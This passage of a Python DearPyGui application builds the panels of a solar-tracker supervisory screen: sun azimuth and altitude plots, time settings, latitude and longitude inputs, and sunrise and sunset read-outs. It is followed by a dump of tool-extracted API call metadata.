        with dpg.group( horizontal = True ):
            # Daily azimuth plot: line series = day path, scatter = current point
            with dpg.plot( tag = 2_2_1_0, label = 'Azimute do dia', height = 312, width = 478, anti_aliased = True ):
                dpg.add_plot_legend()
                dpg.add_plot_axis( dpg.mvXAxis, label = 'Hora [h]' , tag = 2_2_1_1, parent = 2_2_1_0, time = True, no_tick_labels = True ) # X
                dpg.add_plot_axis( dpg.mvYAxis, label = 'Angulo [º]', tag = 2_2_1_2, parent = 2_2_1_0 ) # Y
                dpg.set_axis_limits_auto( 2_2_1_1 )
                dpg.set_axis_limits ( 2_2_1_2, -5, 370 )
                dpg.add_line_series ( [], [], tag = 2_2_1_3, label = 'Rota diária', parent = 2_2_1_2 )
                dpg.add_scatter_series ( [], [], tag = 2_2_1_4, label = 'Ponto atual', parent = 2_2_1_2 )
            # Daily altitude plot, same structure
            with dpg.plot( tag = 2_2_2_0, label = 'Altitude do dia', height = 312, width = 478, anti_aliased = True ):
                dpg.add_plot_axis( dpg.mvXAxis, label = 'Hora [h]' , tag = 2_2_2_1, parent = 2_2_2_0, time = True, no_tick_labels = True ) # X
                dpg.add_plot_axis( dpg.mvYAxis, label = 'Angulo [º]', tag = 2_2_2_2, parent = 2_2_2_0 ) # Y
                dpg.set_axis_limits_auto( 2_2_2_1 )
                dpg.set_axis_limits ( 2_2_2_2, -5, 100 )
                dpg.add_plot_legend()
                dpg.add_line_series ( [], [], tag = 2_2_2_3, label = 'Rota diária', parent = 2_2_2_2 )
                dpg.add_scatter_series ( [], [], tag = 2_2_2_4, label = 'Ponto atual', parent = 2_2_2_2 )
    att_sunpos_graphs( )
    # TIME SETTINGS — the HORA_MANUAL flag toggles the automatic/manual panels
    with dpg.window( label = 'Painel de log' , tag = 23_0, no_move = True , no_resize = True, no_collapse = True, no_close = True, no_title_bar = True ) as Painel_log_VG:
        windows["Visualizacao geral"].append( Painel_log_VG )
        dpg.add_text( default_value = 'Informações gerais do sistema')
        with dpg.child_window( tag = 23_00, autosize_x = True, height = 170, menubar = True):
            # Menu toggles HORA_MANUAL (False = automatic, True = manual)
            with dpg.menu_bar( tag = 23_01, label = 'menubar para datetime',):
                dpg.add_menu_item( tag = 23_02, label = 'Hora automática', callback = lambda s, d, u : dpg.set_value(HORA_MANUAL, False), shortcut = 'A data e hora de calculo é definida automaticamente de acordo com a hora do controlador local')
                dpg.add_menu_item( tag = 23_03, label = 'Hora manual' , callback = lambda s, d, u : dpg.set_value(HORA_MANUAL, True ), shortcut = 'A data e hora de calculo é definida pela entrada do operador no supervisório' )
            with dpg.child_window( tag = 23_10):
                # General system information — automatic mode (read-only widgets)
                dpg.add_text( default_value = 'Hora automática')
                dpg.add_drag_floatx( tag = 23_1, label = 'Ano/Mes/Dia Auto' , size = 3, format = '%.0f', speed = 0.1 , min_value = 1 , max_value = 3000 , no_input = True )
                dpg.add_drag_floatx( tag = 23_2, label = 'Hora/Min/Sec Auto' , size = 3, format = '%.0f', speed = 0.1 , no_input = True )
                dpg.add_drag_int ( tag = 23_3, label = 'Valor no dia' , format = '%.0f' , speed = 0.1 , min_value = 0 , max_value = 26*3600, no_input = True, source = TOT_SECONDS, enabled = False)
                dpg.add_drag_int ( tag = 23_4, label = 'Dia Juliano' , format = '%.0f' , speed = 0.1 , min_value = 0 , max_value = 366 , no_input = True, source = JULIANSDAY , enabled = False)
            with dpg.child_window( tag = 23_20):
                # General system information — manual mode (editable widgets)
                dpg.add_text( default_value = 'Hora manual')
                dpg.add_input_floatx( tag = 23_6, label = 'Ano/Mes/Dia Manual' , size = 3, default_value = [2020, 12, 25], format='%.0f', min_value = 1, max_value = 3000 )
                dpg.add_input_floatx( tag = 23_7, label = 'Hora/Min/Sec Manual', size = 3, default_value = [20, 30, 10] , format='%.0f', min_value = 1, max_value = 60 )
                dpg.add_drag_int ( tag = 23_8, label = 'Valor no dia' , format = '%.0f', speed = 0.1 , min_value = 0, max_value = 24*3600, no_input = True, source = TOT_SECONDS, enabled = False )
                # NOTE(review): the label '<NAME>' looks like placeholder/anonymized
                # text — by symmetry with tag 23_4 it should read 'Dia Juliano'; confirm.
                dpg.add_drag_int ( tag = 23_9, label = '<NAME>' , format = '%.0f', speed = 0.1 , min_value = 0, max_value = 366 , no_input = True, source = JULIANSDAY , enabled = False )
            # Show only the panel matching the current HORA_MANUAL mode
            dpg.hide_item( 23_20 ) if dpg.get_value(HORA_MANUAL) == False else dpg.hide_item( 2_3_1_0 )
        dpg.add_spacer( height = 5 )
        with dpg.child_window( tag = 23_30, autosize_x = True, autosize_y = True ):
            # Local longitude/latitude settings, propagated to SUN_DATA on edit
            with dpg.child_window ( height = 90 ):
                dpg.add_text ( default_value = 'Definições de longitude e latitude local')
                dpg.add_input_float( label = 'Latitude' , tag = 2_3_10, min_value = -90, max_value = 90, format = '%3.8f', indent=0.01, source = LATITUDE , callback = lambda sender, data, user : SUN_DATA.set_latitude( data ) )
                dpg.add_spacer ( )
                dpg.add_input_float( label = 'Longitude', tag = 2_3_11, min_value = -90, max_value = 90, format = '%3.8f', indent=0.01, source = LONGITUDE, callback = lambda sender, data, user : SUN_DATA.set_longitude( data ) )
            dpg.add_spacer( height = 5 )
            with dpg.child_window( height = 150 ):
                # Sun information read-outs (azimuth, altitude, elevation, daylight hours)
                dpg.add_text ( default_value = 'Informacoes do sol')
                dpg.add_drag_float ( label = 'Azimute' , tag = 23_12, format = '%4.2f', speed = 1, no_input = True, source = AZIMUTE )
                dpg.add_spacer ( )
                dpg.add_drag_float ( label = 'Altitude' , tag = 23_13, format = '%4.2f', speed = 1, no_input = True, source = ZENITE )
                dpg.add_spacer ( )
                dpg.add_drag_float ( label = 'Elevação (m)' , tag = 23_14, format = '%4.0f', speed = 1, no_input = True, source = ALTITUDE )
                dpg.add_spacer ( )
                dpg.add_drag_floatx( label = 'Horas de sol' , tag = 23_15, size = 3, format = '%.0f', no_input = True )
            dpg.add_spacer( height = 5 )
            with dpg.child_window( height = 200 ):
                # Points of interest: sunrise, culmination, sunset
                # NOTE(review): the sunrise row writes H_SUNRISE, but the row
                # labeled 'Culminante' writes H_SUNSET and the row labeled
                # 'Por do sol' writes H_CULMINANT — the last two sources look
                # swapped; confirm against the registry definitions.
                dpg.add_text ( default_value = "Posicoes de interesse", )
                dpg.add_text ( default_value = 'Nascer do sol (hh/mm/ss)')
                dpg.add_drag_floatx( tag = 2_3_16, size = 3, format='%.0f', speed=1, no_input= True, callback = lambda sender, data, user : dpg.set_value( H_SUNRISE , data.extend([0])) )
                dpg.add_spacer ( )
                dpg.add_text ( default_value = 'Culminante (hh/mm/ss)' )
                dpg.add_drag_floatx( tag = 2_3_17, size = 3, format='%.0f', speed=1, no_input= True, callback = lambda sender, data, user : dpg.set_value( H_SUNSET , data.extend([0])) )
                dpg.add_spacer ( )
                dpg.add_text ( default_value = 'Por do sol (hh/mm/ss)' )
                dpg.add_drag_floatx( tag = 2_3_18, size = 3, format='%.0f', speed=1, no_input= True, callback = lambda sender, data, user : dpg.set_value( H_CULMINANT, data.extend([0])) )
    dpg.hide_item( 21_0 )
    dpg.hide_item( 22_0 )
    dpg.hide_item( 23_0 )
def resize_visualizacaoGeral( ):
    """Re-fit every 'Visualizacao geral' window to the current size of
    'mainWindow' and redraw the sun-path diagram accordingly."""
    main_w = dpg.get_item_width( 'mainWindow' )
    main_h = dpg.get_item_height( 'mainWindow' )
    # Top-level windows: drawing (21_0), sun-path plots (22_0), log panel (23_0)
    dpg.configure_item( 21_0 , width = main_w*2/3     , height = main_h*3/5     , pos = [10, 25] )
    dpg.configure_item( 22_0 , width = main_w*2/3     , height = (main_h*2/5)-35, pos = [10, (main_h*3/5)+30] )
    dpg.configure_item( 23_0 , width = main_w/3 - 20  , height = main_h - 30    , pos = [main_w*2/3 + 15, 25] )
    # Drawlist inside the drawing window, then redraw the diagram
    draw_w = dpg.get_item_width( 21_0 )
    draw_h = dpg.get_item_height( 21_0 )
    dpg.configure_item( 21_10 , width = draw_w-20 , height = draw_h-50 )
    update_sun_trajetory( draw_id = 2_1_1_0 , parent_id = 2_1_0 )
    # Azimuth (22_10) and altitude (22_20) plot child-windows
    dpg.configure_item( 22_10 , width = (main_w/3)-15 , height = (main_h*2/5)*0.8 , pos = [5, 20] )
    dpg.configure_item( 22_20 , width = (main_w/3)-15 , height = (main_h*2/5)*0.8 , pos = [(main_w*2/3)//2 + 5, 20] )
def render_visualizacaoGeral( ):
    """Per-frame update of the 'Visualizacao geral' screen.

    Synchronizes the date/time widgets (automatic vs. manual mode driven by
    HORA_MANUAL), the sun-position read-outs, the day plots and the sun-path
    drawing.
    """
    global TOT_SECONDS , JULIANSDAY, HORA_MANUAL
    global HOUR, MINUTE, SECOND
    global YEAR, MONTH , DAY
    # Automatic time: follow the local controller clock
    if dpg.get_value( HORA_MANUAL ) == False :
        SUN_DATA.update_date()
        dpg.set_value( 23_1, value = [ dpg.get_value(YEAR), dpg.get_value(MONTH) , dpg.get_value(DAY) ] )    # automatic date
        dpg.set_value( 23_2, value = [ dpg.get_value(HOUR), dpg.get_value(MINUTE), dpg.get_value(SECOND)] )  # automatic time
        dpg.hide_item( 23_2_0 )
        dpg.show_item( 23_1_0 )
    # Manual time: read the input widgets and apply them when they form a valid date
    else:
        yearm, monthm, daym = dpg.get_value( 23_6 )[:-1]
        hourm, minutem, secondm = dpg.get_value( 23_7 )[:-1]
        try:
            data = dt.datetime( int(yearm), int(monthm), int(daym), int(hourm), int(minutem), int(secondm) )
            dt.datetime.timestamp( data )  # raises if outside the representable timestamp range
            SUN_DATA.set_date( data )
            SUN_DATA.update()
            dpg.set_value(YEAR  , yearm )
            dpg.set_value(MONTH , monthm )
            dpg.set_value(DAY   , daym )
            dpg.set_value(HOUR  , hourm )
            dpg.set_value(MINUTE, minutem)
            dpg.set_value(SECOND, secondm)
        except (ValueError, TypeError, OverflowError, OSError):
            # Invalid or partial manual input: keep the previous date.
            # (The original used a bare `except:`, which also hid unrelated
            # programming errors; narrowed to what the lines above can raise.)
            pass
        # Julian day and total seconds in the day
        dpg.set_value( 23_9, SUN_DATA.dia_juliano )   # Julian day
        dpg.set_value( 23_8, SUN_DATA.total_seconds)  # seconds elapsed in the day
        dpg.hide_item( 23_1_0 )
        dpg.show_item( 23_2_0 )
    # Azimuth, altitude (degrees) and elevation read-outs
    dpg.set_value( 23_12, math.degrees( SUN_DATA.azi) )  # azimuth
    dpg.set_value( 23_13, math.degrees( SUN_DATA.alt) )  # altitude
    dpg.set_value( 23_14, SUN_DATA.altitude )            # elevation
    # Daylight duration split into hours / minutes / seconds
    diff_sunlight = (SUN_DATA.sunset - SUN_DATA.rising).seconds
    dpg.set_value( 2_3_15, [diff_sunlight//3600, (diff_sunlight//60)%60 , diff_sunlight%60 ] )
    # Sunrise, culmination (highest point) and sunset, shifted to local time
    dpg.set_value( 23_16, [ SUN_DATA.rising.hour+SUN_DATA.utc_local , SUN_DATA.rising.minute , SUN_DATA.rising.second ] )   # sunrise
    dpg.set_value( 23_17, [ SUN_DATA.transit.hour+SUN_DATA.utc_local, SUN_DATA.transit.minute, SUN_DATA.transit.second ] )  # culmination
    dpg.set_value( 23_18, [ SUN_DATA.sunset.hour+SUN_DATA.utc_local , SUN_DATA.sunset.minute , SUN_DATA.sunset.second ] )   # sunset
    update_sun_trajetory( draw_id = 21_1_0 , parent_id = 21_0 )
    att_sunpos_graphs()
"dearpygui.dearpygui.set_axis_limits",
"dearpygui.dearpygui.set_axis_limits_auto",
"math.cos",
"dearpygui.dearpygui.window",
"dearpygui.dearpygui.add_drag_floatx",
"dearpygui.dearpygui.menu_bar",
"dearpygui.dearpygui.hide_item",
"dearpygui.dearpygui.add_drag_float",
"dearpygui.dearpygui.add_drawlist... | [((5563, 5661), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(id_link + 1)'], {'p1': '[center[0] - r, center[1]]', 'p2': '[center[0] + r, center[1]]'}), '(id_link + 1, p1=[center[0] - r, center[1]], p2=[center[0\n ] + r, center[1]])\n', (5581, 5661), True, 'import dearpygui.dearpygui as dpg\n'), ((6042, 6098), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(id_link + 4)'], {'center': 'center', 'radius': 'r'}), '(id_link + 4, center=center, radius=r)\n', (6060, 6098), True, 'import dearpygui.dearpygui as dpg\n'), ((6133, 6189), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(id_link + 5)'], {'center': 'center', 'radius': '(3)'}), '(id_link + 5, center=center, radius=3)\n', (6151, 6189), True, 'import dearpygui.dearpygui as dpg\n'), ((6224, 6299), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(id_link + 6)'], {'pos': '[center[0] - (r + 20), center[1] - 10]'}), '(id_link + 6, pos=[center[0] - (r + 20), center[1] - 10])\n', (6242, 6299), True, 'import dearpygui.dearpygui as dpg\n'), ((6315, 6389), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(id_link + 7)'], {'pos': '[center[0] + (r + 5), center[1] - 10]'}), '(id_link + 7, pos=[center[0] + (r + 5), center[1] - 10])\n', (6333, 6389), True, 'import dearpygui.dearpygui as dpg\n'), ((6406, 6481), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(id_link + 8)'], {'pos': '[center[0] - 10, center[1] - (r + 25)]'}), '(id_link + 8, pos=[center[0] - 10, center[1] - (r + 25)])\n', (6424, 6481), True, 'import dearpygui.dearpygui as dpg\n'), ((6497, 6541), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(id_link + 9)'], {'points': 'dots'}), '(id_link + 9, points=dots)\n', (6515, 6541), True, 'import dearpygui.dearpygui as dpg\n'), ((6588, 6639), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(id_link + 10)'], {'p1': 'center', 'p2': 'sun'}), '(id_link + 10, 
p1=center, p2=sun)\n', (6606, 6639), True, 'import dearpygui.dearpygui as dpg\n'), ((6679, 6723), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(id_link + 11)'], {'center': 'sun'}), '(id_link + 11, center=sun)\n', (6697, 6723), True, 'import dearpygui.dearpygui as dpg\n'), ((7798, 7836), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(2213)'], {'x': 'PTI', 'y': 'AZI'}), '(2213, x=PTI, y=AZI)\n', (7816, 7836), True, 'import dearpygui.dearpygui as dpg\n'), ((7864, 7908), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(2214)'], {'x': 'time_scrt', 'y': 'azi'}), '(2214, x=time_scrt, y=azi)\n', (7882, 7908), True, 'import dearpygui.dearpygui as dpg\n'), ((7926, 7978), 'dearpygui.dearpygui.set_axis_limits', 'dpg.set_axis_limits', (['(2211)'], {'ymin': 'PTI[0]', 'ymax': 'PTI[-1]'}), '(2211, ymin=PTI[0], ymax=PTI[-1])\n', (7945, 7978), True, 'import dearpygui.dearpygui as dpg\n'), ((7992, 8030), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(2223)'], {'x': 'PTI', 'y': 'ALT'}), '(2223, x=PTI, y=ALT)\n', (8010, 8030), True, 'import dearpygui.dearpygui as dpg\n'), ((8058, 8102), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(2224)'], {'x': 'time_scrt', 'y': 'alt'}), '(2224, x=time_scrt, y=alt)\n', (8076, 8102), True, 'import dearpygui.dearpygui as dpg\n'), ((8120, 8172), 'dearpygui.dearpygui.set_axis_limits', 'dpg.set_axis_limits', (['(2221)'], {'ymin': 'PTI[0]', 'ymax': 'PTI[-1]'}), '(2221, ymin=PTI[0], ymax=PTI[-1])\n', (8139, 8172), True, 'import dearpygui.dearpygui as dpg\n'), ((16628, 16646), 'dearpygui.dearpygui.hide_item', 'dpg.hide_item', (['(210)'], {}), '(210)\n', (16641, 16646), True, 'import dearpygui.dearpygui as dpg\n'), ((16654, 16672), 'dearpygui.dearpygui.hide_item', 'dpg.hide_item', (['(220)'], {}), '(220)\n', (16667, 16672), True, 'import dearpygui.dearpygui as dpg\n'), ((16680, 16698), 'dearpygui.dearpygui.hide_item', 'dpg.hide_item', (['(230)'], {}), '(230)\n', (16693, 
16698), True, 'import dearpygui.dearpygui as dpg\n'), ((16868, 16940), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(210)'], {'width': '(w * 2 / 3)', 'height': '(h * 3 / 5)', 'pos': '[10, 25]'}), '(210, width=w * 2 / 3, height=h * 3 / 5, pos=[10, 25])\n', (16886, 16940), True, 'import dearpygui.dearpygui as dpg\n'), ((16990, 17083), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(220)'], {'width': '(w * 2 / 3)', 'height': '(h * 2 / 5 - 35)', 'pos': '[10, h * 3 / 5 + 30]'}), '(220, width=w * 2 / 3, height=h * 2 / 5 - 35, pos=[10, h *\n 3 / 5 + 30])\n', (17008, 17083), True, 'import dearpygui.dearpygui as dpg\n'), ((17111, 17198), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(230)'], {'width': '(w / 3 - 20)', 'height': '(h - 30)', 'pos': '[w * 2 / 3 + 15, 25]'}), '(230, width=w / 3 - 20, height=h - 30, pos=[w * 2 / 3 + \n 15, 25])\n', (17129, 17198), True, 'import dearpygui.dearpygui as dpg\n'), ((17349, 17404), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(2110)'], {'width': '(w1 - 20)', 'height': '(h1 - 50)'}), '(2110, width=w1 - 20, height=h1 - 50)\n', (17367, 17404), True, 'import dearpygui.dearpygui as dpg\n'), ((17630, 17709), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(2210)'], {'width': '(w / 3 - 15)', 'height': '(h * 2 / 5 * 0.8)', 'pos': '[5, 20]'}), '(2210, width=w / 3 - 15, height=h * 2 / 5 * 0.8, pos=[5, 20])\n', (17648, 17709), True, 'import dearpygui.dearpygui as dpg\n'), ((17751, 17851), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(2220)'], {'width': '(w / 3 - 15)', 'height': '(h * 2 / 5 * 0.8)', 'pos': '[w * 2 / 3 // 2 + 5, 20]'}), '(2220, width=w / 3 - 15, height=h * 2 / 5 * 0.8, pos=[w *\n 2 / 3 // 2 + 5, 20])\n', (17769, 17851), True, 'import dearpygui.dearpygui as dpg\n'), ((19714, 19752), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['(2314)', 'SUN_DATA.altitude'], {}), '(2314, SUN_DATA.altitude)\n', (19727, 19752), True, 'import 
dearpygui.dearpygui as dpg\n'), ((19960, 20055), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['(2315)', '[diff_sunlight // 3600, diff_sunlight // 60 % 60, diff_sunlight % 60]'], {}), '(2315, [diff_sunlight // 3600, diff_sunlight // 60 % 60, \n diff_sunlight % 60])\n', (19973, 20055), True, 'import dearpygui.dearpygui as dpg\n'), ((20143, 20260), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['(2316)', '[SUN_DATA.rising.hour + SUN_DATA.utc_local, SUN_DATA.rising.minute,\n SUN_DATA.rising.second]'], {}), '(2316, [SUN_DATA.rising.hour + SUN_DATA.utc_local, SUN_DATA.\n rising.minute, SUN_DATA.rising.second])\n', (20156, 20260), True, 'import dearpygui.dearpygui as dpg\n'), ((20284, 20404), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['(2317)', '[SUN_DATA.transit.hour + SUN_DATA.utc_local, SUN_DATA.transit.minute,\n SUN_DATA.transit.second]'], {}), '(2317, [SUN_DATA.transit.hour + SUN_DATA.utc_local, SUN_DATA.\n transit.minute, SUN_DATA.transit.second])\n', (20297, 20404), True, 'import dearpygui.dearpygui as dpg\n'), ((20425, 20542), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['(2318)', '[SUN_DATA.sunset.hour + SUN_DATA.utc_local, SUN_DATA.sunset.minute,\n SUN_DATA.sunset.second]'], {}), '(2318, [SUN_DATA.sunset.hour + SUN_DATA.utc_local, SUN_DATA.\n sunset.minute, SUN_DATA.sunset.second])\n', (20438, 20542), True, 'import dearpygui.dearpygui as dpg\n'), ((809, 836), 'dearpygui.dearpygui.get_item_width', 'dpg.get_item_width', (['draw_id'], {}), '(draw_id)\n', (827, 836), True, 'import dearpygui.dearpygui as dpg\n'), ((840, 868), 'dearpygui.dearpygui.get_item_height', 'dpg.get_item_height', (['draw_id'], {}), '(draw_id)\n', (859, 868), True, 'import dearpygui.dearpygui as dpg\n'), ((3967, 4086), 'dearpygui.dearpygui.draw_circle', 'dpg.draw_circle', ([], {'parent': 'draw_id', 'tag': '(id_link + (12 + n))', 'center': 'p', 'radius': '(2)', 'color': '[n * 4, 255 - n * 2, n * 2, 255]'}), '(parent=draw_id, tag=id_link + (12 + n), center=p, 
radius=2,\n color=[n * 4, 255 - n * 2, n * 2, 255])\n', (3982, 4086), True, 'import dearpygui.dearpygui as dpg\n'), ((4577, 4604), 'dearpygui.dearpygui.get_item_width', 'dpg.get_item_width', (['draw_id'], {}), '(draw_id)\n', (4595, 4604), True, 'import dearpygui.dearpygui as dpg\n'), ((4608, 4636), 'dearpygui.dearpygui.get_item_height', 'dpg.get_item_height', (['draw_id'], {}), '(draw_id)\n', (4627, 4636), True, 'import dearpygui.dearpygui as dpg\n'), ((4659, 4691), 'dearpygui.dearpygui.get_item_width', 'dpg.get_item_width', (['"""mainWindow"""'], {}), "('mainWindow')\n", (4677, 4691), True, 'import dearpygui.dearpygui as dpg\n'), ((4696, 4729), 'dearpygui.dearpygui.get_item_height', 'dpg.get_item_height', (['"""mainWindow"""'], {}), "('mainWindow')\n", (4715, 4729), True, 'import dearpygui.dearpygui as dpg\n'), ((6807, 6855), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(id_link + (12 + n))'], {'center': 'p'}), '(id_link + (12 + n), center=p)\n', (6825, 6855), True, 'import dearpygui.dearpygui as dpg\n'), ((6925, 6951), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['HORA_MANUAL'], {}), '(HORA_MANUAL)\n', (6938, 6951), True, 'import dearpygui.dearpygui as dpg\n'), ((8279, 8449), 'dearpygui.dearpygui.window', 'dpg.window', ([], {'label': '"""Posição solar"""', 'tag': '(210)', 'pos': '[50, 50]', 'width': '(500)', 'height': '(500)', 'no_move': '(True)', 'no_resize': '(True)', 'no_collapse': '(True)', 'no_close': '(True)', 'no_title_bar': '(True)'}), "(label='Posição solar', tag=210, pos=[50, 50], width=500, height=\n 500, no_move=True, no_resize=True, no_collapse=True, no_close=True,\n no_title_bar=True)\n", (8289, 8449), True, 'import dearpygui.dearpygui as dpg\n'), ((8639, 8709), 'dearpygui.dearpygui.add_drawlist', 'dpg.add_drawlist', ([], {'tag': '(2110)', 'width': '(w - 20)', 'height': '(h - 50)', 'label': '"""Solar"""'}), "(tag=2110, width=w - 20, height=h - 50, label='Solar')\n", (8655, 8709), True, 'import dearpygui.dearpygui as dpg\n'), 
((8877, 8980), 'dearpygui.dearpygui.window', 'dpg.window', ([], {'label': '"""Atuação"""', 'tag': '(220)', 'no_move': '(True)', 'no_resize': '(True)', 'no_collapse': '(True)', 'no_close': '(True)'}), "(label='Atuação', tag=220, no_move=True, no_resize=True,\n no_collapse=True, no_close=True)\n", (8887, 8980), True, 'import dearpygui.dearpygui as dpg\n'), ((9085, 9150), 'dearpygui.dearpygui.add_text', 'dpg.add_text', (['"""Área para a atução da posição dos paineis solares"""'], {}), "('Área para a atução da posição dos paineis solares')\n", (9097, 9150), True, 'import dearpygui.dearpygui as dpg\n'), ((10806, 10934), 'dearpygui.dearpygui.window', 'dpg.window', ([], {'label': '"""Painel de log"""', 'tag': '(230)', 'no_move': '(True)', 'no_resize': '(True)', 'no_collapse': '(True)', 'no_close': '(True)', 'no_title_bar': '(True)'}), "(label='Painel de log', tag=230, no_move=True, no_resize=True,\n no_collapse=True, no_close=True, no_title_bar=True)\n", (10816, 10934), True, 'import dearpygui.dearpygui as dpg\n'), ((11050, 11109), 'dearpygui.dearpygui.add_text', 'dpg.add_text', ([], {'default_value': '"""Informações gerais do sistema"""'}), "(default_value='Informações gerais do sistema')\n", (11062, 11109), True, 'import dearpygui.dearpygui as dpg\n'), ((13821, 13845), 'dearpygui.dearpygui.add_spacer', 'dpg.add_spacer', ([], {'height': '(5)'}), '(height=5)\n', (13835, 13845), True, 'import dearpygui.dearpygui as dpg\n'), ((16786, 16818), 'dearpygui.dearpygui.get_item_width', 'dpg.get_item_width', (['"""mainWindow"""'], {}), "('mainWindow')\n", (16804, 16818), True, 'import dearpygui.dearpygui as dpg\n'), ((16822, 16855), 'dearpygui.dearpygui.get_item_height', 'dpg.get_item_height', (['"""mainWindow"""'], {}), "('mainWindow')\n", (16841, 16855), True, 'import dearpygui.dearpygui as dpg\n'), ((17288, 17311), 'dearpygui.dearpygui.get_item_width', 'dpg.get_item_width', (['(210)'], {}), '(210)\n', (17306, 17311), True, 'import dearpygui.dearpygui as dpg\n'), ((17316, 17340), 
'dearpygui.dearpygui.get_item_height', 'dpg.get_item_height', (['(210)'], {}), '(210)\n', (17335, 17340), True, 'import dearpygui.dearpygui as dpg\n'), ((18051, 18077), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['HORA_MANUAL'], {}), '(HORA_MANUAL)\n', (18064, 18077), True, 'import dearpygui.dearpygui as dpg\n'), ((18385, 18404), 'dearpygui.dearpygui.hide_item', 'dpg.hide_item', (['(2320)'], {}), '(2320)\n', (18398, 18404), True, 'import dearpygui.dearpygui as dpg\n'), ((18417, 18436), 'dearpygui.dearpygui.show_item', 'dpg.show_item', (['(2310)'], {}), '(2310)\n', (18430, 18436), True, 'import dearpygui.dearpygui as dpg\n'), ((19173, 19213), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['(239)', 'SUN_DATA.dia_juliano'], {}), '(239, SUN_DATA.dia_juliano)\n', (19186, 19213), True, 'import dearpygui.dearpygui as dpg\n'), ((19270, 19312), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['(238)', 'SUN_DATA.total_seconds'], {}), '(238, SUN_DATA.total_seconds)\n', (19283, 19312), True, 'import dearpygui.dearpygui as dpg\n'), ((19383, 19402), 'dearpygui.dearpygui.hide_item', 'dpg.hide_item', (['(2310)'], {}), '(2310)\n', (19396, 19402), True, 'import dearpygui.dearpygui as dpg\n'), ((19415, 19434), 'dearpygui.dearpygui.show_item', 'dpg.show_item', (['(2320)'], {}), '(2320)\n', (19428, 19434), True, 'import dearpygui.dearpygui as dpg\n'), ((19517, 19543), 'math.degrees', 'math.degrees', (['SUN_DATA.azi'], {}), '(SUN_DATA.azi)\n', (19529, 19543), False, 'import math\n'), ((19626, 19652), 'math.degrees', 'math.degrees', (['SUN_DATA.alt'], {}), '(SUN_DATA.alt)\n', (19638, 19652), False, 'import math\n'), ((6974, 6994), 'datetime.datetime.utcnow', 'dt.datetime.utcnow', ([], {}), '()\n', (6992, 6994), True, 'import datetime as dt\n'), ((7628, 7654), 'math.degrees', 'math.degrees', (['SUN_DATA.azi'], {}), '(SUN_DATA.azi)\n', (7640, 7654), False, 'import math\n'), ((7658, 7684), 'math.degrees', 'math.degrees', (['SUN_DATA.alt'], {}), '(SUN_DATA.alt)\n', (7670, 
7684), False, 'import math\n'), ((7716, 7748), 'datetime.datetime.timestamp', 'dt.datetime.timestamp', (['last_date'], {}), '(last_date)\n', (7737, 7748), True, 'import datetime as dt\n'), ((8577, 8600), 'dearpygui.dearpygui.get_item_width', 'dpg.get_item_width', (['(210)'], {}), '(210)\n', (8595, 8600), True, 'import dearpygui.dearpygui as dpg\n'), ((8604, 8628), 'dearpygui.dearpygui.get_item_height', 'dpg.get_item_height', (['(210)'], {}), '(210)\n', (8623, 8628), True, 'import dearpygui.dearpygui as dpg\n'), ((9164, 9190), 'dearpygui.dearpygui.group', 'dpg.group', ([], {'horizontal': '(True)'}), '(horizontal=True)\n', (9173, 9190), True, 'import dearpygui.dearpygui as dpg\n'), ((11135, 11204), 'dearpygui.dearpygui.child_window', 'dpg.child_window', ([], {'tag': '(2300)', 'autosize_x': '(True)', 'height': '(170)', 'menubar': '(True)'}), '(tag=2300, autosize_x=True, height=170, menubar=True)\n', (11151, 11204), True, 'import dearpygui.dearpygui as dpg\n'), ((13863, 13923), 'dearpygui.dearpygui.child_window', 'dpg.child_window', ([], {'tag': '(2330)', 'autosize_x': '(True)', 'autosize_y': '(True)'}), '(tag=2330, autosize_x=True, autosize_y=True)\n', (13879, 13923), True, 'import dearpygui.dearpygui as dpg\n'), ((14658, 14682), 'dearpygui.dearpygui.add_spacer', 'dpg.add_spacer', ([], {'height': '(5)'}), '(height=5)\n', (14672, 14682), True, 'import dearpygui.dearpygui as dpg\n'), ((15535, 15559), 'dearpygui.dearpygui.add_spacer', 'dpg.add_spacer', ([], {'height': '(5)'}), '(height=5)\n', (15549, 15559), True, 'import dearpygui.dearpygui as dpg\n'), ((18516, 18534), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['(236)'], {}), '(236)\n', (18529, 18534), True, 'import dearpygui.dearpygui as dpg\n'), ((18577, 18595), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['(237)'], {}), '(237)\n', (18590, 18595), True, 'import dearpygui.dearpygui as dpg\n'), ((18738, 18765), 'datetime.datetime.timestamp', 'dt.datetime.timestamp', (['data'], {}), '(data)\n', (18759, 
